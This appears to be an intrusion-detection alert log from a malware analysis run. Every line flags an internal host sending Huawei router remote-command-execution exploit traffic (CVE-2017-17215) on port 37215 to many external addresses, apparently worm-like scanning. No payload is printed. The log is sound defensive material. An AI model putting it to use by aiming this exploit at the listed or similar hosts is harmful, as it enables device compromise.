                                                        06/13/24-21:32:30.100712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430437215192.168.2.14197.44.200.108
                                                        06/13/24-21:32:03.307261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627837215192.168.2.1441.10.71.174
                                                        06/13/24-21:32:23.929860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173437215192.168.2.1441.223.30.178
                                                        06/13/24-21:33:05.014523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759437215192.168.2.14197.77.127.161
                                                        06/13/24-21:32:38.300575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583837215192.168.2.1441.179.118.247
                                                        06/13/24-21:33:15.256868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851437215192.168.2.14197.6.92.4
                                                        06/13/24-21:32:54.711221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556637215192.168.2.14197.228.130.174
                                                        06/13/24-21:32:54.707435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730837215192.168.2.1441.224.86.8
                                                        06/13/24-21:32:28.028349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097637215192.168.2.1441.33.100.218
                                                        06/13/24-21:32:03.276594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654837215192.168.2.1441.30.149.64
                                                        06/13/24-21:33:09.086660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995637215192.168.2.1441.123.100.87
                                                        06/13/24-21:33:11.172660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398437215192.168.2.14197.66.7.252
                                                        06/13/24-21:31:57.135509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921037215192.168.2.1441.47.228.86
                                                        06/13/24-21:32:07.415950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889437215192.168.2.14156.144.116.14
                                                        06/13/24-21:32:36.248341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050037215192.168.2.14197.130.223.204
                                                        06/13/24-21:32:58.821023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3489837215192.168.2.14156.152.88.128
                                                        06/13/24-21:32:03.300223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349437215192.168.2.14197.121.4.160
                                                        06/13/24-21:32:56.789967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520037215192.168.2.1441.253.165.215
                                                        06/13/24-21:32:11.488718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836237215192.168.2.1441.224.141.21
                                                        06/13/24-21:32:38.302763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388837215192.168.2.1441.46.78.44
                                                        06/13/24-21:33:11.158494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726037215192.168.2.1441.49.219.136
                                                        06/13/24-21:32:09.439565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737037215192.168.2.1441.43.233.97
                                                        06/13/24-21:32:25.971285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631037215192.168.2.1441.136.87.106
                                                        06/13/24-21:33:13.230611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986437215192.168.2.14156.126.84.63
                                                        06/13/24-21:32:19.729888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353037215192.168.2.14197.172.15.168
                                                        06/13/24-21:32:48.573129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782037215192.168.2.1441.197.57.83
                                                        06/13/24-21:33:02.955000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.1441.64.80.55
                                                        06/13/24-21:33:04.991316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271637215192.168.2.14197.239.79.240
                                                        06/13/24-21:32:52.660457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772437215192.168.2.14156.252.90.147
                                                        06/13/24-21:33:13.231662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992637215192.168.2.14197.89.246.89
                                                        06/13/24-21:32:09.440872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639437215192.168.2.1441.83.90.183
                                                        06/13/24-21:32:09.458744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378837215192.168.2.14197.194.184.253
                                                        06/13/24-21:32:38.300443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.14197.131.209.37
                                                        06/13/24-21:32:44.454468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327237215192.168.2.14197.112.88.208
                                                        06/13/24-21:32:42.424038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913637215192.168.2.14197.239.209.106
                                                        06/13/24-21:32:50.613615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706037215192.168.2.14197.54.100.120
                                                        06/13/24-21:33:09.108959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321837215192.168.2.14156.7.243.242
                                                        06/13/24-21:32:19.728346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6087037215192.168.2.14156.124.242.180
                                                        06/13/24-21:33:09.128553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228637215192.168.2.1441.120.209.11
                                                        06/13/24-21:32:11.488076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956237215192.168.2.14156.236.246.10
                                                        06/13/24-21:31:57.094255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845237215192.168.2.14197.14.227.73
                                                        06/13/24-21:32:13.547328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258037215192.168.2.14197.175.72.60
                                                        06/13/24-21:32:25.990162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.14197.42.207.127
                                                        06/13/24-21:32:42.404493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185037215192.168.2.1441.252.57.43
                                                        06/13/24-21:32:07.401983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6027437215192.168.2.1441.142.140.222
                                                        06/13/24-21:32:05.376711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933837215192.168.2.14156.6.144.224
                                                        06/13/24-21:32:50.632218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367037215192.168.2.14156.245.45.251
                                                        06/13/24-21:33:15.271835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5005037215192.168.2.14156.8.185.87
                                                        06/13/24-21:32:07.402804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771837215192.168.2.14197.87.98.158
                                                        06/13/24-21:32:07.403988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552237215192.168.2.14156.121.145.209
                                                        06/13/24-21:32:03.279772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998237215192.168.2.14197.40.126.172
                                                        06/13/24-21:32:48.555944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603237215192.168.2.14197.136.9.21
                                                        06/13/24-21:32:42.408953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599637215192.168.2.14197.81.246.162
                                                        06/13/24-21:33:15.275504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5260037215192.168.2.14156.115.13.54
                                                        06/13/24-21:32:28.043269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440037215192.168.2.14197.30.245.88
                                                        06/13/24-21:32:03.277127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923237215192.168.2.14156.51.40.232
                                                        06/13/24-21:32:05.376391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917437215192.168.2.1441.137.58.94
                                                        06/13/24-21:32:46.526312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964037215192.168.2.1441.127.118.174
                                                        06/13/24-21:33:13.214066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757037215192.168.2.14156.183.96.11
                                                        06/13/24-21:32:36.266476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377237215192.168.2.1441.54.51.41
                                                        06/13/24-21:32:42.406898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3732837215192.168.2.14156.144.88.188
                                                        06/13/24-21:32:13.566280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310637215192.168.2.1441.80.11.69
                                                        06/13/24-21:32:32.164860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830637215192.168.2.14197.201.79.201
                                                        06/13/24-21:32:11.487044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088637215192.168.2.14156.37.12.159
                                                        06/13/24-21:32:50.630852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071437215192.168.2.14156.78.173.220
                                                        06/13/24-21:32:48.554750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313837215192.168.2.14156.90.202.20
                                                        06/13/24-21:33:17.310565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.14197.250.49.173
                                                        06/13/24-21:33:11.172810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640237215192.168.2.14197.251.218.114
                                                        06/13/24-21:33:15.254756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991637215192.168.2.1441.61.78.164
                                                        06/13/24-21:32:01.221283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446037215192.168.2.14197.136.231.200
                                                        06/13/24-21:33:13.213534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600637215192.168.2.14197.205.165.66
                                                        06/13/24-21:33:02.909036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769037215192.168.2.14197.50.199.17
                                                        06/13/24-21:31:57.135703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068437215192.168.2.14156.79.215.74
                                                        06/13/24-21:32:36.263803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995037215192.168.2.14156.0.95.186
                                                        06/13/24-21:32:50.631928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491437215192.168.2.14197.39.141.5
                                                        06/13/24-21:32:19.729510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752037215192.168.2.14156.188.27.219
                                                        06/13/24-21:32:23.835778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917037215192.168.2.14156.132.112.136
                                                        06/13/24-21:32:40.358180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846237215192.168.2.1441.237.110.103
                                                        06/13/24-21:32:40.355710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813237215192.168.2.14197.188.107.252
                                                        06/13/24-21:32:52.669401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991637215192.168.2.14197.237.146.83
                                                        06/13/24-21:32:32.165773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063837215192.168.2.14156.49.26.230
                                                        06/13/24-21:32:09.438750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164437215192.168.2.1441.103.122.120
                                                        06/13/24-21:32:15.632464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324237215192.168.2.1441.173.152.169
                                                        06/13/24-21:33:00.872464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656837215192.168.2.14156.92.21.235
                                                        06/13/24-21:32:15.605041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637037215192.168.2.14197.165.99.31
                                                        06/13/24-21:32:13.567508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641237215192.168.2.14156.49.220.49
                                                        06/13/24-21:33:13.212948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4137837215192.168.2.14197.252.176.46
                                                        06/13/24-21:32:17.696214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026437215192.168.2.14197.51.215.78
                                                        06/13/24-21:32:09.460196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346837215192.168.2.14156.87.24.30
                                                        06/13/24-21:32:40.379186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673237215192.168.2.1441.194.131.169
                                                        06/13/24-21:32:09.456779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642037215192.168.2.14156.220.52.129
                                                        06/13/24-21:32:32.164437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190837215192.168.2.14197.169.146.88
                                                        06/13/24-21:32:48.569777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908837215192.168.2.14156.202.228.179
                                                        06/13/24-21:32:44.452640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674637215192.168.2.14156.215.117.129
                                                        06/13/24-21:33:07.058633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598437215192.168.2.14156.41.73.12
                                                        06/13/24-21:32:28.043366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530637215192.168.2.1441.180.227.129
                                                        06/13/24-21:33:15.253542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5808037215192.168.2.1441.175.124.45
                                                        06/13/24-21:32:54.707355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498237215192.168.2.1441.251.94.208
                                                        06/13/24-21:33:11.155811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631237215192.168.2.14197.167.239.113
                                                        06/13/24-21:32:30.077850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5540837215192.168.2.1441.114.254.251
                                                        06/13/24-21:32:42.408377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058237215192.168.2.1441.149.118.125
                                                        06/13/24-21:32:28.027511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695637215192.168.2.14156.241.251.73
                                                        06/13/24-21:32:11.486037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373437215192.168.2.1441.167.165.215
                                                        06/13/24-21:33:00.866241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948637215192.168.2.14156.15.80.158
                                                        06/13/24-21:32:05.350608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904237215192.168.2.1441.151.127.185
                                                        06/13/24-21:32:44.458400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038637215192.168.2.14197.67.234.172
                                                        06/13/24-21:32:46.524689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948037215192.168.2.14197.101.220.83
                                                        06/13/24-21:32:23.836690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983837215192.168.2.1441.152.229.249
                                                        06/13/24-21:32:17.674587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478037215192.168.2.14197.61.178.14
                                                        06/13/24-21:32:36.245158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787037215192.168.2.14197.192.177.46
                                                        06/13/24-21:32:38.298258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408837215192.168.2.14197.89.29.44
                                                        06/13/24-21:32:40.374225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566637215192.168.2.14197.248.20.168
                                                        06/13/24-21:32:44.455078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535837215192.168.2.14197.137.18.237
                                                        06/13/24-21:32:07.415465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4819837215192.168.2.1441.41.151.118
                                                        06/13/24-21:32:19.749280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947837215192.168.2.14197.117.255.117
                                                        06/13/24-21:32:19.730934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625037215192.168.2.1441.4.99.9
                                                        06/13/24-21:33:13.211540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401837215192.168.2.14156.217.42.163
                                                        06/13/24-21:32:36.267241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5175237215192.168.2.1441.2.219.83
                                                        06/13/24-21:32:17.696299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145437215192.168.2.14197.228.249.68
                                                        06/13/24-21:33:02.914051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154237215192.168.2.1441.53.92.123
                                                        06/13/24-21:32:23.940881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4927637215192.168.2.14197.38.157.212
                                                        06/13/24-21:32:30.100910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349637215192.168.2.14156.9.228.200
                                                        06/13/24-21:32:05.378674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000437215192.168.2.1441.25.165.229
                                                        06/13/24-21:32:28.025154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576037215192.168.2.1441.234.63.95
                                                        06/13/24-21:33:09.085589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690837215192.168.2.14197.247.81.185
                                                        06/13/24-21:32:30.096062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334637215192.168.2.14156.150.60.131
                                                        06/13/24-21:32:38.323170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739837215192.168.2.14156.32.135.216
                                                        06/13/24-21:32:01.220890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278237215192.168.2.1441.0.119.130
                                                        06/13/24-21:32:23.942808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797037215192.168.2.1441.26.191.152
                                                        06/13/24-21:32:30.079616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783037215192.168.2.1441.236.80.153
                                                        06/13/24-21:32:48.573634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638837215192.168.2.1441.254.158.230
                                                        06/13/24-21:32:32.155169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105037215192.168.2.1441.18.12.130
                                                        06/13/24-21:32:34.194830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480837215192.168.2.14156.110.129.80
                                                        06/13/24-21:31:57.133391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725837215192.168.2.14156.41.219.101
                                                        06/13/24-21:33:09.088316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376637215192.168.2.1441.174.203.97
                                                        06/13/24-21:33:11.158384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519837215192.168.2.14197.143.189.48
                                                        06/13/24-21:33:11.177263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828037215192.168.2.1441.165.116.188
                                                        06/13/24-21:32:19.730825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428037215192.168.2.1441.61.10.104
                                                        06/13/24-21:31:57.093175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965837215192.168.2.1441.106.105.176
                                                        06/13/24-21:32:42.404333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962437215192.168.2.1441.228.165.26
                                                        06/13/24-21:32:48.551659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509837215192.168.2.14197.179.144.239
                                                        06/13/24-21:33:07.056888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410237215192.168.2.1441.97.238.90
                                                        06/13/24-21:32:42.424674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457037215192.168.2.14156.255.158.210
                                                        06/13/24-21:33:09.090869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199637215192.168.2.14197.168.21.94
                                                        06/13/24-21:32:15.634555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865237215192.168.2.14197.82.233.20
                                                        06/13/24-21:32:15.607324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5423837215192.168.2.14156.91.90.59
                                                        06/13/24-21:32:15.634436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020637215192.168.2.14197.207.64.104
                                                        06/13/24-21:32:32.169272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703637215192.168.2.14156.19.49.45
                                                        06/13/24-21:32:38.322596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606037215192.168.2.14156.226.242.107
                                                        06/13/24-21:31:57.134430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906837215192.168.2.1441.221.78.125
                                                        06/13/24-21:33:09.091429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356437215192.168.2.14156.159.168.179
                                                        06/13/24-21:32:01.248532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4956237215192.168.2.14156.221.199.41
                                                        06/13/24-21:32:46.509839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917037215192.168.2.14197.169.210.26
                                                        06/13/24-21:33:13.210726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011437215192.168.2.14156.27.41.157
                                                        06/13/24-21:32:13.566369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064237215192.168.2.14156.105.56.196
                                                        06/13/24-21:32:07.400652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142237215192.168.2.14197.57.212.94
                                                        06/13/24-21:33:15.252238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5802837215192.168.2.1441.72.49.19
                                                        06/13/24-21:32:11.505485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994837215192.168.2.1441.247.121.200
                                                        06/13/24-21:32:40.377977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414437215192.168.2.14197.18.90.61
                                                        06/13/24-21:32:48.572882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727437215192.168.2.14156.120.49.207
                                                        06/13/24-21:32:15.630340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784637215192.168.2.14156.218.17.184
                                                        06/13/24-21:32:17.694181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3590437215192.168.2.14156.249.118.26
                                                        06/13/24-21:32:42.422865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701637215192.168.2.14156.109.26.204
                                                        06/13/24-21:32:32.150849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717237215192.168.2.1441.135.1.101
                                                        06/13/24-21:31:59.173929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493437215192.168.2.14197.2.27.218
                                                        06/13/24-21:32:48.569995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960837215192.168.2.14156.251.57.34
                                                        06/13/24-21:31:59.197767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989237215192.168.2.1441.1.47.57
                                                        06/13/24-21:32:01.221638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407837215192.168.2.1441.208.236.211
                                                        06/13/24-21:32:23.942318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.14156.36.57.61
                                                        06/13/24-21:32:40.378115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911237215192.168.2.14156.31.232.184
                                                        06/13/24-21:31:59.176366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021037215192.168.2.1441.26.109.199
                                                        06/13/24-21:32:19.729758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084837215192.168.2.14156.195.191.106
                                                        06/13/24-21:32:58.838858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292837215192.168.2.1441.86.117.186
                                                        06/13/24-21:32:54.708154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980237215192.168.2.14156.103.154.186
                                                        06/13/24-21:31:59.196703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764437215192.168.2.1441.98.48.97
                                                        06/13/24-21:31:59.175803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.14156.254.199.241
                                                        06/13/24-21:32:30.076626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902837215192.168.2.14156.229.104.23
                                                        06/13/24-21:32:48.572494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921237215192.168.2.1441.242.238.90
                                                        06/13/24-21:33:17.341227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715637215192.168.2.14156.14.105.101
                                                        06/13/24-21:32:42.407964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382837215192.168.2.1441.141.108.154
                                                        06/13/24-21:32:48.553558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618637215192.168.2.14156.241.189.204
                                                        06/13/24-21:32:54.725647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705637215192.168.2.14197.212.198.249
                                                        06/13/24-21:32:03.274692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150437215192.168.2.14197.233.249.101
                                                        06/13/24-21:32:32.155562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147437215192.168.2.1441.207.123.174
                                                        06/13/24-21:33:05.017361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311637215192.168.2.14197.14.144.103
